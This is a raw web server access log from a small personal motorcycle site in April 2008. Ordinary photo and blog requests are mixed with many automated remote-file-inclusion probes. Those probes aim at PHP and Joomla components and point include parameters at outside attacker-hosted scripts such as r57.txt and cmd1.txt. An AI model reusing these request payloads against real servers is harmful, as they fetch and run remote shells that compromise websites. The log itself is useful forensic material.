67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:24:58 -0700] "GET /logs/access_080215.log/voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:24:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:24:58 -0700] "GET /voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:24:59 -0700] "GET /logs/voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:25:03 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:25:04 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:25:04 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:13:25:12 -0700] "GET /logs/access_071227.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:13:25:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [07/Apr/2008:13:25:14 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [07/Apr/2008:13:25:14 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [07/Apr/2008:13:25:14 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:13:25:15 -0700] "GET /logs/access_080306.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [07/Apr/2008:13:25:22 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:13:25:23 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:13:25:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:13:25:23 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:13:25:23 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:13:25:29 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:25:34 -0700] "GET /logs/access_080223.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:25:34 -0700] "GET /logs//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [07/Apr/2008:13:25:47 -0700] "GET /logs/access_080126.log/components/com_forum/download.php?phpbb_root_path=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.128.138 - - [07/Apr/2008:13:25:55 -0700] "GET /logs/access_080218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.128.138 - - [07/Apr/2008:13:25:55 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:13:26:59 -0700] "GET //calendar.php?l=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.162 - - [07/Apr/2008:13:27:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.230 - - [07/Apr/2008:13:27:04 -0700] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.72.191.2 - - [07/Apr/2008:13:27:13 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:13:27:32 -0700] "GET /logs/access_071226.log//calendar.php?l=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:13:27:32 -0700] "GET //calendar.php?l=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.25.195.93 - - [07/Apr/2008:13:27:32 -0700] "GET /logs//calendar.php?l=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.36.82 - - [07/Apr/2008:13:28:06 -0700] "GET /logs/access_080130.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [07/Apr/2008:13:28:10 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [07/Apr/2008:13:28:13 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:28:22 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:28:23 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:28:32 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.86 - - [07/Apr/2008:13:29:04 -0700] "GET //oneadmin/newspublish/include.php?path%5bdocroot%5d=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.1.238.170 - - [07/Apr/2008:13:30:32 -0700] "GET /logs/access_080329.log//include.php?path%5Bdocroot%5D=http://td-sts.ru/modules/syetan? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.36.82 - - [07/Apr/2008:13:30:44 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.12 - - [07/Apr/2008:13:30:44 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://borovskr.kaluga.ru/templates/calmsolution? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.91.249.193 - - [07/Apr/2008:13:30:47 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [07/Apr/2008:13:30:49 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [07/Apr/2008:13:30:49 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:13:31:08 -0700] "GET /index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
66.235.216.127 - - [07/Apr/2008:13:31:11 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.235.216.127 - - [07/Apr/2008:13:31:11 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.235.216.127 - - [07/Apr/2008:13:31:11 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:13:31:21 -0700] "GET /logs/access_070928.log HTTP/1.0" 200 16581 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:13:31:32 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.249.193 - - [07/Apr/2008:13:31:52 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.45.142 - - [07/Apr/2008:13:32:01 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.156 - - [07/Apr/2008:13:32:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.115 - - [07/Apr/2008:13:32:11 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 6398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.191.68.75 - - [07/Apr/2008:13:32:43 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:13:32:44 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:13:32:44 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:13:33:13 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:13:33:14 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:13:33:15 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:13:34:16 -0700] "GET /logs/access_080329.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:34:31 -0700] "GET /logs/access_080207.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [07/Apr/2008:13:34:35 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.63.191.237 - - [07/Apr/2008:13:35:11 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jef.at/sp/vnc/r57.txt?? HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:35:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:35:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:21 -0700] "GET / HTTP/1.1" 200 7371 "http://www.st-owners.com/forums/showthread.php?p=424112#post424112" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:21 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:21 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:22 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:22 -0700] "GET /blog/wp-content/themes/default/images/kubrickbg.jpg HTTP/1.1" 200 1043 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:22 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:22 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
209.85.105.25 - - [07/Apr/2008:13:36:29 -0700] "GET /logs/access_080113.log/index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [07/Apr/2008:13:36:32 -0700] "GET /index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [07/Apr/2008:13:36:32 -0700] "GET /logs/index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:36:48 -0700] "GET /blog/index.php/2008/04/ HTTP/1.1" 200 6430 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:36:51 -0700] "GET //tools/send_reminders.php?includedir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
84.123.223.221 - - [07/Apr/2008:13:36:56 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:37:02 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 6410 "http://dmulk.com/blog/2008/04/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
208.66.74.50 - - [07/Apr/2008:13:37:04 -0700] "GET /logs/access_080218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://masherry.athost.net/cek/ech.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.66.74.50 - - [07/Apr/2008:13:37:04 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://masherry.athost.net/cek/ech.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:37:06 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:37:13 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 7090 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:37:13 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:37:23 -0700] "GET /blog/ HTTP/1.1" 200 7372 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
69.93.48.162 - - [07/Apr/2008:13:37:44 -0700] "GET /logs/access_080113.log/index.php?place=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
68.192.247.161 - - [07/Apr/2008:13:38:13 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?p=423602#post423602" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:38:21 -0700] "GET /logs//login.php?dir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:38:24 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 6410 "http://dmulk.com/blog/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:38:26 -0700] "GET //login.php?dir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
83.3.191.66 - - [07/Apr/2008:13:38:34 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.223.243.5 - - [07/Apr/2008:13:38:37 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.1" 200 6410 "http://dmulk.com/blog/category/motorcycles/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:38:37 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:13:38:38 -0700] "GET //tools/send_reminders.php?includedir=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
60.249.45.142 - - [07/Apr/2008:13:38:57 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [07/Apr/2008:13:38:58 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [07/Apr/2008:13:38:59 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.157 - - [07/Apr/2008:13:39:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.151 - - [07/Apr/2008:13:39:16 -0700] "GET / HTTP/1.0" 200 7355 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:13:39:41 -0700] "GET /logs/access_080313.log//atom.php5?page=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:39:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.67.120.48 - - [07/Apr/2008:13:39:59 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
